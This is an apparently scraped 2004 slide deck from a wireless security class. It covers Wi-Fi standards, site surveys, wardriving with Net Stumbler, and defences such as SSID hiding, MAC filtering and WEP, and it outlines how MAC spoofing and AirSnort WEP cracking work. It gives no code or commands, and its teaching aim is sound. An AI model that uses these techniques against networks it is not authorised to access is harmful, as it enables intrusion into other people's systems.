790 likes | 891 Vues
Wireless Security Part 1 3/10/04 Mark Lachniet, Analysts International. Introductions. Mark Lachniet, Technical Director of Analyst International’s Security Services Group Technical lead developing for services, methodology, quality control, technical presales
E N D
Wireless Security Part 1 3/10/04 Mark Lachniet, Analysts International
Introductions • Mark Lachniet, Technical Director of Analyst International’s Security Services Group • Technical lead developing for services, methodology, quality control, technical presales • Certified Information Systems Auditor (CISA) from ISACA • Certified Information Systems Security Professional (CISSP) ISC^2 • Linux LPIC-1, Novell Master CNE, Microsoft MCSE, Checkpoint CCSE, TruSecure ICSA, etc. • Former I.T. director of Holt Public Schools • Frequent speaker for local organizations
Agenda • Overview of Wireless • Wireless frequency types and products • Controlling signal and site surveys • Wireless modes of operation • Wardriving and Warchalking • Basic wireless security features • Advanced wireless security features • Wireless in the network environment • Conclusions • Discussion
Class Logistics • Frequent breaks, maybe not 20 mins. • I do not mind if you mess around with your computers while I am talking, in fact I encourage it - you are here because you want to be • Will attempt to do more hands-on exercises and less talking • Please speak up! This will be most useful if you ask questions! Don’t wait for the end • Consider finding a partner, especially one of a higher or lower technical skill level
Class CD-ROM • I have included a CD-ROM with many tools and utilities on it • Some of these we will use, some of them we may not • Most are 30-day expiring demos • You should go to the web site(s) yourself and download the software, so you can get registered
Why Wireless? • Flexibility • Instructional Potential (mobile labs, data collection, research in common areas, etc.) • Overcome building limitations (all brick, asbestos, leased buildings, etc.) • Ubiquitous technology - built into many PDAs and Laptops • In use in many homes, coffee shops, airports • Many people already have it on their laptop, making it easy for visits, ad-hoc meetings
Why Not Wireless • Speed considerations (11mb/s or 54mb/s theoretical throughput - actually much slower than this in reality) • Security, both real and perceived, especially cost of supporting infrastructure • Signal interference from other devices • Signal penetration problems through dense materials • Changing technologies and standards • A little bit too much “fun” for bored students to hack
Wireless Technology • Wireless, and especially wireless security operate at many different levels in many different ways • For the purposes of our class, we will start with the most basic elements of wireless technology (hardware) and work our way up to the most complex (applications) • One of the best representations of this type of abstraction is the OSI model
The OSI Model • The OSI Model is used to describe different layers of networks and network services • Layers 1 and 2 are at the “hardware” level, but in our case there are no wires, but rather signals • Layer 3, 4 and 5 deal with association and TCP/IP, which may be handled by a wireless Access Point / router
Types of Wireless • Lets focus first at the lowest levels of the OSI model - frequencies and standards • Wireless has a few standards: • Frequency Hopping Spread Spectrum (FHSS) • Direct Sequence Spread Spectrum (DSSS) • Orthogonal Frequency Division Multiplexing (OFDM) • FHSS is used in Proxim cards, in industrial applications, barcode scanners, etc. • DSSS is the most common type, used most in WLAN cards, access devices, etc. • OFDM is used in modern 54mb/s devices
Direct Sequence Spread Spectrum • High-speed code sequence manages frequency modulation • Produces signal centered at carrier frequency
Frequency Hopping Spread Spectrum • Code function determines “hops” to manage frequency modulation • Carrier is flat across spectrum
Orthogonal Frequency Division • Uses multiple carrier waves on different frequencies • Each wave carries part of the message • Used for 54mb/s applications (802.11a/g) • May designate a number of encoding types
Wireless Types and Frequencies • Frequencies: • 802.11b and 802.11g are both 2.4ghz • 802.11a is 5ghz • Bandwidth • The 5ghz space has more bandwidth (throughput speed capability) • Non-Overlapping Channels (may not match APs) • 802.11/b/g @ 2.4ghz has 3 • 802.11a @ 5ghz has 4 • Compatibility • 802.11g is usually backwards compatible with 802.11b @ 11mb/s only • 802.11a isn’t compatible
Interference / Penetration / Leakage • Managing your signal is an important part of Wireless security • If you can control your signal, keeping it mostly inside, you can worry less about hackers outside of your building • At the same time, you want to make sure you can penetrate all important areas of your building • You also need to be aware of interference issues from phones, microwaves, cell towers, etc. • Use non-overlapping channels wisely • The best way to make these determinations is by doing a site survey
Performing a Site Survey • The Site Survey Toolkit • One or more access points • Various antennas and cables • Various WLAN NIC cards • Distance Roller thingy • Tape, ZIP ties, etc. • One or more people • May need walkie-talkies • Keep people away from the equipment
Performing a Site Survey • Attempt to find the best configuration of WLAN equipment by setting it up and measuring signal • Use a blueprint or floor layout map of the target area • Use the roller to determine distance • Measure signal characteristics at various locations to develop a signal coverage map • Should use the exact hardware that will be installed • Looks at signal strength, signal to noise ratios, and access ranges at specific speeds • Consider potential usage - 5 users @ 54mb/s or 20 users @ 11mb/s? (lock wireless cards at that speed, and map with this in mind)
Use Built In Tools w/ Laptop • Analyze signal strength and signal to noise ratio using a client utility (passive mode) • Lock your card at a specific speed and just walk away until it stops working • Use the client utility to generate a large number of packets and see how many arrive correctly (active mode)
Install AP and Measure Speed • For example, place it more or less in the middle of the Gym - in this case there is a signal problem in the Library
Directional Antennas • A directional antenna may help direct signal & stop leaks
Wireless Components • The most common type of Wireless Local Area Network (WLAN) infrastructure typically involves two components • An Access Point, which works as a kind of “smart hub” to allow communication • A Client, which is typically a laptop, desktop or PDA with a wireless NIC • Within this paradigm are any number of different products, technologies or variations • The base standard for wireless LAN is 802.11, as determined by the IEEE: http://grouper.ieee.org/groups/802/11/index.html
Ad-Hoc Mode • In Ad-Hoc mode, all devices can talk to each other directly (if they are in range and on the same frequency) • Relatively uncommon, used in WAN configurations, LAN Games, impromptu meetings, etc. • Referred to as an Independent Basic Service Set (IBSS)
Ad-Hoc Mode Definition • http://www.webopedia.com/TERM/A/ad_hoc_mode.html • “An 802.11 networking framework in which devices or stations communicate directly with each other, without the use of an access point (AP). Ad-hoc mode is also referred to as peer-to-peer mode or an Independent Basic Service Set (IBSS). Ad-hoc mode is useful for establishing a network where wireless infrastructure does not exist or where services are not required.”
Infrastructure Mode • The most common type of WLAN is the infrastructure Mode - used most places • All devices talk to the access point • Referred to as a Basic Service Set (BSS).
Infrastructure Mode Definition • http://www.webopedia.com/TERM/I/infrastructure_mode.html • “An 802.11 networking framework in which devices communicate with each other by first going through an Access Point (AP). In infrastructure mode, wireless devices can communicate with each other or can communicate with a wired network. When one AP is connected to wired network and a set of wireless stations it is referred to as a Basic Service Set (BSS). An Extended Service Set (ESS) is a set of two or more BSSs that form a single subnetwork. Most corporate wireless LANs operate in infrastructure mode because they require access to the wired LAN in order to use services such as fileservers or printers. “
Advanced Infrastructure Mode • There may be multiple access points in an environment • This raises a number of issues, including mobile clients • Comprised of multiple BSS’ to create an Extended Service Set (ESS)
Extended Service Set • Uses a 32-char ID to represent the ESS, known as an ESSID (or SSID) such as “USR8054” • This essentially represents “the network” and is something all users must have configured in some way
SSID Example • For example, this is how it looks on a USR8054 • Note the ability to turn off the broadcast of the SSID
Wardriving • One popular hobby for geeks is to “war drive” for wireless networks • Using special software such as Net Stumbler, drive or walk around looking for access points, frequently “chalking” them and/or recording the location with a GPS (then uploading coordinates to the Internet) • http://www.netstumbler.com • Passive scanners will just passively listen for SSID broadcasts • Active scanners will probe for them • Scanners will usually tell you if advanced security (encryption) is configured • Some will even tell you about connected clients
Wardriving Resources • http://Michiganwireless.org • http://Netstumbler.com • http://www.wardriving.com • http://www.wigle.net/ (locations) • http://packetstormsecurity.org/wireless • type in ‘war drive’ in google :)
Activity #1: War Driving • Install a Lucent Wavelan / Orinoco card in your laptop • Install Net Stumbler from your CD-ROM • Run the application, observe the local network • Survey the facilities (?) and win a prize?
Activity #2: Protocol Analyzer • Install WinPCap • Reboot • Install Ethereal on your laptop • Associate with the access point (it may complain about it being insecure, that is OK) • Run Ethereal
Basic Wireless Security Features • There are a number of basic wireless security features and protocols: • Utilize static IP addresses • SSID Security (not broadcasting SSID) • MAC Address Filtering • WEP Encryption • Signal control and speed locking • 802.1X Authentication / Encryption • WPA Authentication / Encryption • External security (VPN, VLAN, or other things not part of wireless per se
Utilize Static IP • Although it won’t stop a hacker with a protocol analyzer, using static IP address assignment instead of DHCP will help • This will stop the casual and/or stupid hackers from automatically getting an IP address and being allowed to surf • It creates a management burden, as each laptop must be uniquely identified ahead of time • It also creates an opportunity, as you can figure out what a user is doing on the network very easily
SSID Broadcasting • For an extremely minimal amount of security, you can turn off SSID broadcasting • This means that someone must somehow know or discover the SSID in order to use the access point • May be able to identify the SSID through analyzing network traffic from another user (via. AP Association Frames) • Active scanners may find this through a “brute force SSID” scan (rare) • Windows may “remember” the AP/SSID
Activity #3: SSID Broadcast • Now that I have turned off SSID Broadcast, disassociate with the AP • Stop and restart Net Stumbler • Is the access point still visible? • Can you connect to it anyway through windows by manually typing in the SSID? • The SSID: USR8054
MAC Address Filtering • Each network device has a unique hardware identifier built into it, called a MAC address • In Windows, use ‘ipconfig /all’ to view the current MAC address of your devices • This can be used for security purposes
Problems with MAC Filtering • Although MAC addresses are hard-coded, they can be changed in some hardware via software • Thus, a hacker would only have to sniff enough traffic to learn some “allowed” MAC addresses, and then impersonate that MAC address • Also, MAC address filtering can be very painful to manage in the long haul: • How do you keep track of all the addresses? • What about traveling users and visitors? • What is the maximum # of MAC addresses you access point will allow you to type in?
Activity #4: MAC Filtering • I will now configure the AP to only allow my own MAC • Try not to lock yourself out of your AP :)
WEP Encryption • To get around the various wireless security problems, an early solution was WEP • This allows you to configure a 40bit, 64bit or 128bit key to encrypt traffic • A WEP key is essentially a password • Normally, the same WEP keys are manually programmed into the client and access point • If the WEP keys match, the devices can communicate • WEP encryption is better than nothing but it still has its problems
WEP Encryption Problems • First of all, the WEP key must be stored on the client computer (or typed in each time) • Thus, the security of the client workstation(s) is very important • It might be possible to steal the WEP key from the registry or some configuration file • Also, WEP adds a little bit of processing overhead (3% in hardware?) • Most importantly, the WEP implementation is flawed and WEP encryption can be cracked!
Cracking WEP • Software such as AirSnort (http://airsnort.shmoo.com/) allows you to monitor encrypted wireless activity and eventually get enough information to crack a WEP key • The problem is due to a flawed implementation of the RC4 protocol in WEP • Specifically, while almost everything in the packet is encrypted, a plain-text “Initialization Vector” is used to keep the encryption in sync • This IV periodically computes in a way that provides interesting information about the key • Given enough packets, 5-10 million, AirSnort can crack the WEP key